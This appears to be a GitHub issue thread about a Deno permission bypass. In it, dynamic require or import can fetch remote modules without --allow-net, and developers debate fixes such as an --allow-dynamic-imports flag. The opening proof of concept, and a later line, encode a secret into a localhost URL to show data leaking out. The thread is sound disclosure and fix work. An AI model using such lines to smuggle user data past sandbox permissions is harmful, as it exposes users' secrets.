eval(`require(["http://localhost:8080/a.ts?secret=value"], () => {
console.log("Done");
})`);
export const x = null;
As shown above, an attacker can still send user's sensitive data to somewhere online even when the user does not provide the --allow-net option.
We can provide a new flag (e.x: --allow-require) and return null from _makeLocalRequire() unless user provides that flag.
https://github.com/denoland/deno/blob/3deaf99a92aeea347e1530f309fd4b226e9677d3/js/compiler.ts#L305-L331
Yes, this is indeed a problem. Also with dynamic imports. I don't like --allow-requre because it introduces the term "require" into a platform where users might only know "import". What about --allow-dynamic-imports ? Maybe it's simpler to require --allow-net for dynamic imports.
I'm +1 on --allow-dynamic-imports but requiring users to provide --allow-net makes the situation even worse!
Because there is nothing such as NPM or any other _local_ package manager, a lot of projects will depend on the remote module loading so every (or most of) project will require --allow-net and it will decrease the security.
People will create aliases to Deno like alias deno="deno --allow-net", because they will get frustrated by typing --allow-net for every single execution :(
Users can always ignore everything and include all flags in an alias. I don't think it's possible to protect a developer from himself. --allow-net kind of makes sense because it is a network call.
I'm just thinking out loud here 馃槉
I would be 馃憤 on --allow-dynamic-imports. My opinion, like imports of https:// should be transparent to the user without needing --allow-net, it is really something that really shouldn't deal with userland security.
Instead of just passing undefined/null, it would be better to return a function what simply calls the errback with an error indicating the need to enable the feature.
I suggest handling this in the privileged side, currently, we can send a signal from TS to rust and say we've loaded all the allowed modules:
https://github.com/denoland/deno/blob/8020f5fc0b27bf229544461ab885494233e0e4ef/js/compiler.ts#L577-L589
We just need to add a sendSync() call before calling _drainRunQueue() and after receiving that message in rust, inside handle_code_fetch() we should check and see if --allow-dynamic-imports flag is provided by the user or not, each time it's been called.
https://github.com/denoland/deno/blob/8020f5fc0b27bf229544461ab885494233e0e4ef/src/handlers.rs#L164-L173
I don't know what happens after landing #693, @kitsonk any thoughts?
I think #693 is going to be stalled because of the performance stuff for a while, even then, there would still be a _drainRunQueue() and so that proposed flow could still work, but that wasn't where I was thinking. I was thinking more here:
https://github.com/denoland/deno/blob/35bc9ddf636734a424b8f69ca7a49af071193002/js/compiler.ts#L225-L227
Especially since it is a flag. If --allow-dynamic-imports is not flagged, then instead of the local require, we would return something like:
return (
deps: ModuleSpecifier[],
callback: AmdCallback,
errback: AmdErrback
): void => {
errback(new Error("Dynamic import not allowed.");
};
I have a question, although it is not appropriate to ask questions here. How does TS perform in deno, is to transfer TS to JS to v8, or run ts directly.Sorry for my English
deno does not keep query parameters in its cache right now, maybe it's a bug?
if it's not, doesn't it make sense to show an error if URL has query parameters?
does not matter, secret still can be URL:
require(["http://localhost:8080/secret_value.js"]);
any one working on it? can i take this up?
I have a question, although it is not appropriate to ask questions here. How does TS perform in deno, is to transfer TS to JS to v8, or run ts directly.Sorry for my English
go through readme. deno uses flatbuffers to communication between ts , rust and c
@cedric05 it works a bit like this:
js/main.ts and its dependencies are transpiled into JavaScript at build time (which includes the TypeScript compiler). This includes the code for the communication to Rust using flatbuffers.js/main.ts which creates a load of JavaScript objects and then creates a snapshot of the memory.deno binary.denoMain() from js/main.ts and send the startup message, which denoMain().denoMain() will get to the end of the function, where compiler.run() is invoked with the main module that has been passed on the command line.DenoCompiler class in js/compiler.ts is an abstraction to the TypeScript compiler. When it is asked to "run" a module, it first resolves it.codeFetch in js/os.ts to get the module. This communicates to Rust via flatbuffers.js/os.ts to codeCache which will tell Rust to cache the source code and the transpiled code.@ry is this still relevant with ES modules landed?
dynamic import support was removed...
Let's close this. We can start a new one if I forget to properly permission dynamic import when I do it.
adding dynamic import would make creating a custom aws lambda runtime easier. As Amazon defines the function location and handleer in a bunch of env variables meaning you have to import(dir + handler etc)
Maybe time to reopen this?
Most helpful comment
Yes, this is indeed a problem. Also with dynamic imports. I don't like
--allow-requrebecause it introduces the term "require" into a platform where users might only know "import". What about--allow-dynamic-imports? Maybe it's simpler to require--allow-netfor dynamic imports.